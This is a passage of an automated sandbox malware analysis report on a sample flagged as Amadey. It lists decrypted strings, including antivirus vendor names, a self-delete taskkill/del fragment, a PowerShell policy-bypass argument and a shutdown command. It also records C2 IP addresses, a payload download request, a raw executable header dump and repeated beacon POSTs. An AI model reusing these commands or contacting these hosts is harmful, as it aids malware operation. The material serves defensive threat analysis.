                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: http://
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: https://
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: /quiet
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Plugins/
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: &unit=
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: shell32.dll
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: kernel32.dll
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProgramData\
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: AVAST Software
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Kaspersky Lab
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Panda Security
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Doctor Web
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 360TotalSecurity
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Bitdefender
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Norton
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Sophos
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Comodo
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: WinDefender
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0123456789
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: ------
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: ?scr=1
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: ComputerName
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: -unicode-
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: VideoID
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProductName
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: CurrentBuild
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32.exe
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: random
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000419
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000422
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000423
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0000043f

                  Phishing

                  barindex
                  Yara detected obfuscated html page
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, type: DROPPED
                  Source: uw7A6EF76R.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: Htem.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb,V source: powershell.exe, 00000008.00000002.1004489959.0000020058E30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ADC2A2 FindFirstFileExW,0_2_00ADC2A2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49696 -> 176.113.115.6:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 176.113.115.6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 12:45:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 09 Mar 2025 12:35:50 GMTETag: "1d9000-62fe818841936"Accept-Ranges: bytesContent-Length: 1937408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 70 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4d 00 00 04 00 00 15 50 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 58 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 57 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6f 75 72 66 74 70 75 00 80 1a 00 00 e0 32 00 00 7c 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 79 62 61 78 76 62 63 00 10 00 00 00 60 4d 00 00 04 00 00 00 6a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4d 00 00 22 00 00 00 6e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                  Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                  Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
